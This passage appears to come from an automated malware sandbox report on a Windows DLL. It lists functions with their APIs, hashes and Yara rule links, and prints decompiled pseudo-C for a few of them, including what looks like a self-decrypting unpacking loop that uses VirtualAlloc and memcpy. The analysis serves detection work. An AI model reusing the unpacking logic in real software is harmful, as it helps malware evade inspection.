    • Instruction Fuzzy Hash: 0CF01C36606622BBEF125BA08C1CF5BBF79FB0A752F02880DFA0991950D72188119BA5
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D529B8B, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 150COMMON
    Download Yara Rule
    APIs
    • FindFirstChangeNotificationW.KERNEL32(6D5765F0,00000001,00000002,?,00000000,?,00000000,?,?,6D52A9C8,?,?,00000000,?,?,00000000), ref: 6D529BAC
    • GetEnvironmentVariableW.KERNEL32(6D5694B8,6D5765F0,0000046C,?,00000000,?,?,6D52A9C8,?,?,00000000,?,?,00000000,?,?), ref: 6D529C4C
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: ChangeEnvironmentFindFirstNotificationVariable
    • String ID: T@Wm$p@Wm$|@Wm
    • API String ID: 3880921956-4016660527
    • Opcode ID: 9493a9e2ba7cc660259aae52545f3e680d20d35343845b78211e0c9e58bfcdc3
    • Instruction ID: 056b6ea205a3d9f54d750bf959eb7774311ffb0b00422237921ebc2038dbc496
    • Opcode Fuzzy Hash: 9493a9e2ba7cc660259aae52545f3e680d20d35343845b78211e0c9e58bfcdc3
    • Instruction Fuzzy Hash: DF51EFB25442218FCF18CF28E8847B577F1F79B202B27462AE8559BF94F7745848CBA1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D544CA5, Relevance: 7.7, APIs: 5, Instructions: 186COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: _free$AllocateHeap
    • String ID:
    • API String ID: 3033488037-0
    • Opcode ID: 2f43f04e58bbe6c05d01fdf0cc8188675ab469ef88a5caa6e33b3a43e7653991
    • Instruction ID: d06f77792ee8f0ddd8581fb2f5d9e3da557fbdd9d909316860f9029486c7d242
    • Opcode Fuzzy Hash: 2f43f04e58bbe6c05d01fdf0cc8188675ab469ef88a5caa6e33b3a43e7653991
    • Instruction Fuzzy Hash: 11510371A44305AFDB19CF69C841B7A77F4FF88324F118969E919DBA60E770DA00CB82
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D54D765, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
    Download Yara Rule
    APIs
    • _free.LIBCMT ref: 6D54D77D
      • Part of subcall function 6D545D93: HeapFree.KERNEL32(00000000,00000000,?,6D538848,?,?,?,6D52E166,?,?,?,6D529FF1,?), ref: 6D545DA9
      • Part of subcall function 6D545D93: GetLastError.KERNEL32(?,?,6D538848,?,?,?,6D52E166,?,?,?,6D529FF1,?), ref: 6D545DBB
    • _free.LIBCMT ref: 6D54D78F
    • _free.LIBCMT ref: 6D54D7A1
    • _free.LIBCMT ref: 6D54D7B3
    • _free.LIBCMT ref: 6D54D7C5
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 72887fa64af672fe7e2439ad2e8b4b1ff67d823f2ec064b20a9fe35355c73ccb
    • Instruction ID: 35cc19189a2f0fc8b008971ae3c199cd004566ee5b58b77260024d7b70d8c769
    • Opcode Fuzzy Hash: 72887fa64af672fe7e2439ad2e8b4b1ff67d823f2ec064b20a9fe35355c73ccb
    • Instruction Fuzzy Hash: FBF0EC315046699BCB18DB58E4C9E3673E9AA86714762CC16F165D7D10CF20F9814A92
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D52F271, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMON
    Download Yara Rule
    APIs
    • RtlEncodePointer.NTDLL(00000000), ref: 6D52F296
    • CatchIt.LIBVCRUNTIME ref: 6D52F37C
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: CatchEncodePointer
    • String ID: MOC$RCC
    • API String ID: 1435073870-2084237596
    • Opcode ID: 69c7c68cc7cc3b85c3d7a282baf7875b96fde169ffe522946f7c77f3c2881310
    • Instruction ID: a149f0fe58e4c2dfae35c050c13240cf5a38d9f4efe91a3d641bacf0499868ba
    • Opcode Fuzzy Hash: 69c7c68cc7cc3b85c3d7a282baf7875b96fde169ffe522946f7c77f3c2881310
    • Instruction Fuzzy Hash: 4541877190020AEFCF0ACFA5DC80AEEBBB6FF48344F158498FA05A7690D3359A54DB50
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D52B60E, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63COMMON
    Download Yara Rule
    APIs
    • __is_exception_typeof.LIBVCRUNTIME ref: 6D52B6A2
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: __is_exception_typeof
    • String ID: MOC$RCC$csm
    • API String ID: 3140442014-2671469338
    • Opcode ID: f074bce0c1c85b75a9a213a391aed05fb8ce6408951da73dd4d9d74826b09ea2
    • Instruction ID: 65002f9509fbad7b982c144353000c565b5793898702aadffe886003448096e7
    • Opcode Fuzzy Hash: f074bce0c1c85b75a9a213a391aed05fb8ce6408951da73dd4d9d74826b09ea2
    • Instruction Fuzzy Hash: E51190311042069FD70CEF65C405BAAB7B8EF80319F164899D9618BAA1DB74FD44CB92
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D52A170, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMON
    Download Yara Rule
    APIs
    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6D52A17C
      • Part of subcall function 6D52E171: RaiseException.KERNEL32(E06D7363,00000001,00000003,6D528974,?,?,?,6D528974,?,6D571A64), ref: 6D52E1D1
    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6D52A19C
    • std::regex_error::regex_error.LIBCPMT ref: 6D52A1BC
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: std::invalid_argument::invalid_argument$ExceptionRaisestd::regex_error::regex_error
    • String ID: bad function call
    • API String ID: 182364050-3612616537
    • Opcode ID: eb8131b079970fb7f17637cf0409d17c8aa618f2d6eaa16ce78d543e3019643a
    • Instruction ID: 821b17d38d87001d10ad88e0c54a7a50f43c3187920555c8d0b2ac57b33860c0
    • Opcode Fuzzy Hash: eb8131b079970fb7f17637cf0409d17c8aa618f2d6eaa16ce78d543e3019643a
    • Instruction Fuzzy Hash: FE014B78D0810CBBCF08FBF4DC55CED777DAB50100F914420EB2092999EB74AA1D8AE1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D54BAA0, Relevance: 6.3, APIs: 4, Instructions: 320COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: _strrchr
    • String ID:
    • API String ID: 3213747228-0
    • Opcode ID: 4da106a83ccec4f85020f1f0bf658ed4c3ba0ab2ab9f6f0fcb3d6225d5b3b75b
    • Instruction ID: 28a116ae2d610d7241b0095b3a87153722b14fbd7b8edaf7050acac51c309f4a
    • Opcode Fuzzy Hash: 4da106a83ccec4f85020f1f0bf658ed4c3ba0ab2ab9f6f0fcb3d6225d5b3b75b
    • Instruction Fuzzy Hash: ADB158329082869FDB09DF68C8807FEBBF5EF95344F15C5AAD8409BA41D7348D02CB52
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D5329BB, Relevance: 6.2, APIs: 4, Instructions: 201COMMON
    Download Yara Rule
    APIs
    • __EH_prolog3.LIBCMT ref: 6D5329C2
    • UnDecorator::getSymbolName.LIBCMT ref: 6D532A50
    • DName::operator+.LIBCMT ref: 6D532B54
      • Part of subcall function 6D530565: shared_ptr.LIBCMT ref: 6D530581
    • DName::DName.LIBVCRUNTIME ref: 6D532C11
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: Name$Decorator::getH_prolog3Name::Name::operator+Symbolshared_ptr
    • String ID:
    • API String ID: 334624791-0
    • Opcode ID: f5581dcdb7fd1787a0a1adc69bb76e881bf901422e0ff261f7d5f60c4c7668f6
    • Instruction ID: 587d2070596cf407629af46028d83733f3b256ece8c05a4906e21d4246238f51
    • Opcode Fuzzy Hash: f5581dcdb7fd1787a0a1adc69bb76e881bf901422e0ff261f7d5f60c4c7668f6
    • Instruction Fuzzy Hash: 89818C71C05B6A9FDF19CF98D490BEEBBB4FB0A314F06845AD514ABA40E770D944CBA0
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D52EC64, Relevance: 6.2, APIs: 4, Instructions: 168COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: AdjustPointer
    • String ID:
    • API String ID: 1740715915-0
    • Opcode ID: 463ba503fbb3b0819dcbe6e3f4c28e25c10fb48d53c2e950280cfab30cd6551c
    • Instruction ID: 26e74fac6d2ba16532016b230caa9d8b2aa9705fdeb7cc2bb171e2082c77197a
    • Opcode Fuzzy Hash: 463ba503fbb3b0819dcbe6e3f4c28e25c10fb48d53c2e950280cfab30cd6551c
    • Instruction Fuzzy Hash: 1751BF726046029FEB2D8F64D891BBA77B5FF81310F10492DE91197ED1E731E888CB90
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D533065, Relevance: 6.1, APIs: 4, Instructions: 144COMMON
    Download Yara Rule
    APIs
    • DName::DName.LIBVCRUNTIME ref: 6D5330ED
      • Part of subcall function 6D530206: __aulldvrm.LIBCMT ref: 6D530237
    • DName::operator+.LIBCMT ref: 6D5330FA
    • DName::operator=.LIBVCRUNTIME ref: 6D53317A
    • DName::DName.LIBVCRUNTIME ref: 6D53319A
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: NameName::$Name::operator+Name::operator=__aulldvrm
    • String ID:
    • API String ID: 2448499823-0
    • Opcode ID: 241bb6100157547b4340d68b951d3264de6f32d66e02e24b278c6a8df7c9acbe
    • Instruction ID: 8f2ad706809acf011a399084095663370adedff8d9835a7f0ca3f68c03d70b1d
    • Opcode Fuzzy Hash: 241bb6100157547b4340d68b951d3264de6f32d66e02e24b278c6a8df7c9acbe
    • Instruction Fuzzy Hash: 32513E70944365DFEB0ECF98C880AAEBBB4FB47341F028596E5155BA50E7B09A41CF91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D5015A3, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96memoryCOMMON
    Download Yara Rule
    C-Code - Quality: 87%
    			E6D5015A3(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				unsigned int _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v44;
				signed int _v48;
				intOrPtr _t39;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				signed int _t59;
				signed int _t61;
				intOrPtr _t66;
				intOrPtr _t77;
				void* _t78;
				signed int _t80;

				_t77 =  *0x6d5041b0;
				_t39 = E6D501A4B(_t77,  &_v20,  &_v12);
				_v16 = _t39;
				if(_t39 == 0) {
					asm("sbb ebx, ebx");
					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
					_t78 = _t77 + _v20;
					_v36 = _t78;
					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4);
					_v24 = _t46;
					if(_t46 == 0) {
						_v16 = 8;
					} else {
						_t61 = 0;
						if(_t59 <= 0) {
							_t47 =  *0x6d5041cc;
						} else {
							_t66 = _a4;
							_t50 = _t46 - _t78;
							_t11 = _t66 + 0x6d505137; // 0x6d505137
							_v28 = _t50;
							_v32 = _t50 + _t11;
							_v8 = _t78;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t19 = _t61 + 1; // 0x2
								_t80 = _t19;
								E6D501D02(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
								_t64 = _v32;
								_v8 = _v8 + 0x1000;
								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
								_t61 = _t80;
								 *0x6d5041cc = _t47;
								if(_t61 >= _t59) {
									break;
								}
								_t50 = _v28;
							}
						}
						if(_t47 != 0x63699bc3) {
							_v16 = 0xc;
						} else {
							memcpy(_v36, _v24, _v12);
						}
						VirtualFree(_v24, 0, 0x8000);
					}
				}
				return _v16;
			}























    0x6d5015aa
    0x6d5015ba
    0x6d5015c1
    0x6d5015c4
    0x6d5015d9
    0x6d5015e0
    0x6d5015e5
    0x6d5015f6
    0x6d5015f9
    0x6d501601
    0x6d501604
    0x6d5016ae
    0x6d50160a
    0x6d50160a
    0x6d50160e
    0x6d501676
    0x6d501610
    0x6d501610
    0x6d501613
    0x6d501615
    0x6d50161d
    0x6d501620
    0x6d501623
    0x6d50162b
    0x6d501633
    0x6d501634
    0x6d501635
    0x6d50163c
    0x6d50163c
    0x6d501650
    0x6d501655
    0x6d50165e
    0x6d501665
    0x6d501668
    0x6d50166c
    0x6d501671
    0x00000000
    0x00000000
    0x6d501628
    0x6d501628
    0x6d501673
    0x6d501680
    0x6d501695
    0x6d501682
    0x6d50168b
    0x6d501690
    0x6d5016a6
    0x6d5016a6
    0x6d5016b5
    0x6d5016bb

    APIs
    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6D5015F9
    • memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6D5017EC), ref: 6D50168B
    • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,00000000), ref: 6D5016A6
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.971096653.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000004.00000002.970828448.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.971390745.000000006D503000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.971599124.000000006D505000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.971834486.000000006D506000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Virtual$AllocFreememcpy
    • String ID: Mar 26 2021
    • API String ID: 4010158826-2175073649
    • Opcode ID: 6841a88af6c7080ea38ebe24bc6bb506a889d254a2cfdb9359d2cb1a609a6e0f
    • Instruction ID: dee5039b5451ba280654101fa7319c3c88ae9f5f6a7798bcc8bf29fbae0ae639
    • Opcode Fuzzy Hash: 6841a88af6c7080ea38ebe24bc6bb506a889d254a2cfdb9359d2cb1a609a6e0f
    • Instruction Fuzzy Hash: 21315E71E0060AABDF05CF99CD80FEEB7B9BF49308F148169D915EBA40D771AA058F91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D545E97, Relevance: 6.1, APIs: 4, Instructions: 86COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 6D546A98: _free.LIBCMT ref: 6D546AA6
      • Part of subcall function 6D547D21: WideCharToMultiByte.KERNEL32(?,00000000,6D54A405,00000000,00000001,6D54A1AC,6D551463,?,6D54A405,?,00000000,?,6D5511C1,0000FDE9,00000000,?), ref: 6D547DC3
    • GetLastError.KERNEL32 ref: 6D545EFF
    • __dosmaperr.LIBCMT ref: 6D545F06
    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6D545F45
    • __dosmaperr.LIBCMT ref: 6D545F4C
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
    • String ID:
    • API String ID: 167067550-0
    • Opcode ID: 240fbe5dbb2dcb07255acc46bf1b26b159b527e0c70bb8676c5822f0d12390cf
    • Instruction ID: 9eb6dafe7d9200fda7ed86e46f3837fcbaf97f0bd8a2a7210f85c49f2a23ce7f
    • Opcode Fuzzy Hash: 240fbe5dbb2dcb07255acc46bf1b26b159b527e0c70bb8676c5822f0d12390cf
    • Instruction Fuzzy Hash: CD21B8B160820ABF9B199FA5888097BB76CFF45368711C914F91897D50D731EC5187A3
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D53327D, Relevance: 6.1, APIs: 4, Instructions: 85COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: NameName::
    • String ID:
    • API String ID: 1333004437-0
    • Opcode ID: 8b9d1b8d5eff98fbf91ae3781094df10960077b78d2d241304f1f26e54b28624
    • Instruction ID: 00a28af2d3f94d9731373130d1b5d8fe4acdc91d99ed917487ff96fa34ed6ece
    • Opcode Fuzzy Hash: 8b9d1b8d5eff98fbf91ae3781094df10960077b78d2d241304f1f26e54b28624
    • Instruction Fuzzy Hash: DD31BF70D08268DFEF0DCFE8C844A9DBBB4BF06344F02845EE541ABA80EBB49845CB01
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D548BE2, Relevance: 6.1, APIs: 4, Instructions: 77COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: fdf945a7d7c27e4a934a3cc50ffb85f1ad3259895fbfe2a211812f45e508dd09
    • Instruction ID: e104195a36241c2f6cf32de74cfb38b75895c99db78d9499ec9cb6f28871afe4
    • Opcode Fuzzy Hash: fdf945a7d7c27e4a934a3cc50ffb85f1ad3259895fbfe2a211812f45e508dd09
    • Instruction Fuzzy Hash: 86212E31946122EBDB1686288E80B5A3F78AF467A0F11C922FD56FFA90D730DC0085E3
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D5435B9, Relevance: 6.1, APIs: 4, Instructions: 72COMMON
    Download Yara Rule
    APIs
    • GetLastError.KERNEL32(?,?,?,6D550F08,?,00000001,6D54A405,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,?), ref: 6D5435BE
    • _free.LIBCMT ref: 6D54361B
    • _free.LIBCMT ref: 6D543651
    • SetLastError.KERNEL32(00000000,6D5740F0,000000FF,?,6D5513D8,00000001,?,?,?,6D54A1AC,?,?,?,6D572358,0000002C,6D54A405), ref: 6D54365C
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: ErrorLast_free
    • String ID:
    • API String ID: 2283115069-0
    • Opcode ID: 5e075ab6da3dd75295dfaf36e0f3867a332f467c8f9dd735dc5efc402c75960e
    • Instruction ID: 95d0528b326a27b6e433836493454785324b290c5f7c400f87f743fb48fea11a
    • Opcode Fuzzy Hash: 5e075ab6da3dd75295dfaf36e0f3867a332f467c8f9dd735dc5efc402c75960e
    • Instruction Fuzzy Hash: 8C11C1711481139BFF1D16759C85B3A26696BC637AF238534F33886DE0DB218D044553
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D543710, Relevance: 6.1, APIs: 4, Instructions: 69COMMON
    Download Yara Rule
    APIs
    • GetLastError.KERNEL32(?,?,?,6D5438E3,6D545DB9,?,?,6D538848,?,?,?,6D52E166,?,?,?,6D529FF1), ref: 6D543715
    • _free.LIBCMT ref: 6D543772
    • _free.LIBCMT ref: 6D5437A8
    • SetLastError.KERNEL32(00000000,6D5740F0,000000FF,?,?,?,6D5438E3,6D545DB9,?,?,6D538848,?,?,?,6D52E166,?), ref: 6D5437B3
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: ErrorLast_free
    • String ID:
    • API String ID: 2283115069-0
    • Opcode ID: 3f16f781df6508636044bf747688fa20f482b016e4c2ca5c82b6530d897c0fb1
    • Instruction ID: 59156dc9f7c67239fb659d1db27d62b33c44edd4795a70a4d8155a6afb0b6ed0
    • Opcode Fuzzy Hash: 3f16f781df6508636044bf747688fa20f482b016e4c2ca5c82b6530d897c0fb1
    • Instruction Fuzzy Hash: 7311E0B514810266FB0946759C85F2A2569BBC637BF23C638F36886DF0EF214E044553
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D53648D, Relevance: 6.1, APIs: 4, Instructions: 62COMMON
    Download Yara Rule
    APIs
    • FreeLibrary.KERNEL32(00000000,?,?,?,6D53654E,?,?,6D588E14,00000000,?,6D536735,00000004,6D56ABEC,6D56ABE4,6D56ABEC,00000000), ref: 6D53651D
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: FreeLibrary
    • String ID:
    • API String ID: 3664257935-0
    • Opcode ID: 2ba2d2e58f428aa8c002e7847253d6e637a6a5eac4f61d8e8adfc34843c860f0
    • Instruction ID: 426b599f5b4ce936f257fa4e4158f1f96369b24e0305c01b445ed3bb43ebeb40
    • Opcode Fuzzy Hash: 2ba2d2e58f428aa8c002e7847253d6e637a6a5eac4f61d8e8adfc34843c860f0
    • Instruction Fuzzy Hash: 0D11C632A44332ABDF168B688C44B5D77B4AF02771F534A35F910E7A84F770E90086E1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D50146C, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E6D50146C() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;

				_t8 =  *0x6d5041b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x6d5041bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 <= 5) {
					_t4 = 0x32;
					return _t4;
				} else {
					 *0x6d5041ac = _t3;
					_t5 = GetCurrentProcessId();
					 *0x6d5041a8 = _t5;
					 *0x6d5041b0 = _t8;
					_t6 = OpenProcess(0x10047a, 0, _t5);
					 *0x6d5041a4 = _t6;
					if(_t6 == 0) {
						 *0x6d5041a4 =  *0x6d5041a4 | 0xffffffff;
					}
					return 0;
				}
			}









    0x6d50146d
    0x6d50147b
    0x6d501483
    0x6d501488
    0x6d5014d2
    0x6d5014d2
    0x6d50148a
    0x6d501492
    0x6d5014ce
    0x6d5014d0
    0x6d501494
    0x6d501494
    0x6d501499
    0x6d5014a7
    0x6d5014ac
    0x6d5014b2
    0x6d5014ba
    0x6d5014bf
    0x6d5014c1
    0x6d5014c1
    0x6d5014cb
    0x6d5014cb

    APIs
    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6D5017B8,73B763F0,00000000), ref: 6D50147B
    • GetVersion.KERNEL32 ref: 6D50148A
    • GetCurrentProcessId.KERNEL32 ref: 6D501499
    • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6D5014B2
    Memory Dump Source
    • Source File: 00000004.00000002.971096653.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000004.00000002.970828448.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.971390745.000000006D503000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.971599124.000000006D505000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.971834486.000000006D506000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Process$CreateCurrentEventOpenVersion
    • String ID:
    • API String ID: 845504543-0
    • Opcode ID: d24ac0b9b1123bea2e23bc1123370a0271dbfaddc020d12d5d9ce5fecf18ea8a
    • Instruction ID: e6b53a10f53e76775d0eda7c37c0f8d80a93b3bef8181569658e77aae2356492
    • Opcode Fuzzy Hash: d24ac0b9b1123bea2e23bc1123370a0271dbfaddc020d12d5d9ce5fecf18ea8a
    • Instruction Fuzzy Hash: 03F09A30645311AFFF409F68AC19F823BB0B72EB12F12841EF145C98C0D3B040408B84
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D501D32, Relevance: 6.0, APIs: 4, Instructions: 30threadCOMMON
    Download Yara Rule
    C-Code - Quality: 86%
    			E6D501D32(void* __ecx, intOrPtr _a4) {
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				if(SetThreadAffinityMask(_t13, 1) != 0) {
					SetThreadPriority(_t13, 0xffffffff);
				}
				_t4 = E6D5017A7(_a4);
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}






    0x6d501d3b
    0x6d501d4e
    0x6d501d53
    0x6d501d53
    0x6d501d59
    0x6d501d5e
    0x6d501d62
    0x6d501d66
    0x6d501d66
    0x6d501d70
    0x6d501d79

    APIs
    • GetCurrentThread.KERNEL32 ref: 6D501D35
    • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6D501D40
    • SetThreadPriority.KERNEL32(00000000,000000FF), ref: 6D501D53
    • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6D501D66
    Memory Dump Source
    • Source File: 00000004.00000002.971096653.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000004.00000002.970828448.000000006D500000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.971390745.000000006D503000.00000002.00020000.sdmp Download File
    • Associated: 00000004.00000002.971599124.000000006D505000.00000004.00020000.sdmp Download File
    • Associated: 00000004.00000002.971834486.000000006D506000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Thread$Priority$AffinityCurrentMask
    • String ID:
    • API String ID: 1452675757-0
    • Opcode ID: 7f1b3bbeb45c378bd781859f0c7e171b8924e2eba9f3509cb3d269e3d2c6fb35
    • Instruction ID: 912eb630870607a73d1147d285cbae17bbc4e0e8740de2f94741d91cbde4f8bf
    • Opcode Fuzzy Hash: 7f1b3bbeb45c378bd781859f0c7e171b8924e2eba9f3509cb3d269e3d2c6fb35
    • Instruction Fuzzy Hash: FFE092313063116BEB062A294C88F6F7BACDFD33367024339F624D25D0DB548C0586A6
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D55846A, Relevance: 6.0, APIs: 4, Instructions: 29COMMON
    Download Yara Rule
    APIs
    • WriteConsoleW.KERNEL32(?,?,6D54A405,00000000,?,?,6D55708B,?,00000001,?,00000001,?,6D550E97,00000000,?,00000001), ref: 6D558481
    • GetLastError.KERNEL32(?,6D55708B,?,00000001,?,00000001,?,6D550E97,00000000,?,00000001,00000000,00000001,?,6D5513FC,6D54A1AC), ref: 6D55848D
      • Part of subcall function 6D558453: CloseHandle.KERNEL32(6D574940,6D55849D,?,6D55708B,?,00000001,?,00000001,?,6D550E97,00000000,?,00000001,00000000,00000001), ref: 6D558463
    • ___initconout.LIBCMT ref: 6D55849D
      • Part of subcall function 6D558415: CreateFileW.KERNEL32(6D56FFF8,40000000,00000003,00000000,00000003,00000000,00000000,6D558444,6D557078,00000001,?,6D550E97,00000000,?,00000001,00000000), ref: 6D558428
    • WriteConsoleW.KERNEL32(?,?,6D54A405,00000000,?,6D55708B,?,00000001,?,00000001,?,6D550E97,00000000,?,00000001,00000000), ref: 6D5584B2
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
    • String ID:
    • API String ID: 2744216297-0
    • Opcode ID: 47d0a9b1d967b31671ef8cfd5b980b2fe918855e3189ebba835ade13e93b45d2
    • Instruction ID: ca9a28d62a191b37c697dec5e38eecc61ba756f227df26cb1d4887d56c0ac264
    • Opcode Fuzzy Hash: 47d0a9b1d967b31671ef8cfd5b980b2fe918855e3189ebba835ade13e93b45d2
    • Instruction Fuzzy Hash: C5F01536112129FBCF535F95DC08A8E3F76FB4E3A6B064511FE0886920C7328820AB92
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D5445B7, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 355COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: _free
    • String ID: -
    • API String ID: 269201875-2547889144
    • Opcode ID: 9091675e5ee01277a4355e9d51ff1a1ef51bdaa6ba45514266698a87500fddac
    • Instruction ID: 7f1ef56be1a11e8570ec3341c267fb7e764bbac703bf913c6f9f9b1deff4cab3
    • Opcode Fuzzy Hash: 9091675e5ee01277a4355e9d51ff1a1ef51bdaa6ba45514266698a87500fddac
    • Instruction Fuzzy Hash: FAC106319442569BDB2CDF64CC40BFA73B9FF49314F11C8AAD915A7980EBB19E80CB52
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6D541E80, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 263COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.972730468.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: __aulldvrm
    • String ID: +$-
    • API String ID: 1302938615-2137968064
